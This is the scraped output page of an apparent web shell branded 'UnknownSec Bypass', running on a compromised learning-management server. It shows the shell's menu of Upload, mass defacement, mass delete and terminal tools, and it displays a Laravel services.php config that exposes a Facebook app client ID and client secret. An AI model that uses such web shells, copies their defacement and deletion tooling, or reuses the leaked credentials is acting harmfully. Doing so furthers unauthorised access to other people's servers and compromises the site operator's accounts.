UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_fac93aa56cd7
/
config
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Stripe, Mailgun, Mandrill, and others. This file provides a sane | default location for this type of information, allowing packages | to have a conventional place to find your various credentials. | */ 'mailgun' => [ 'domain' => '', 'secret' => '', ], 'mandrill' => [ 'secret' => '', ], 'ses' => [ 'key' => '', 'secret' => '', 'region' => 'us-east-1', ], 'stripe' => [ 'model' => 'App\User', 'secret' => '', ], 'facebook' => [ 'client_id' => env('SC_FACEBOOK_CLIENT_ID', '665240853609972'), 'client_secret' => env('SC_FACEBOOK_CLIENT_SECRET', '97f01e9becd71d4894696baa14e39224'), 'redirect' => env('SC_FACEBOOK_REDIRECT', 'http://estudiolms.app/auth/sign-up-facebook/'), ], ];
Copyright © 2026 - UnknownSec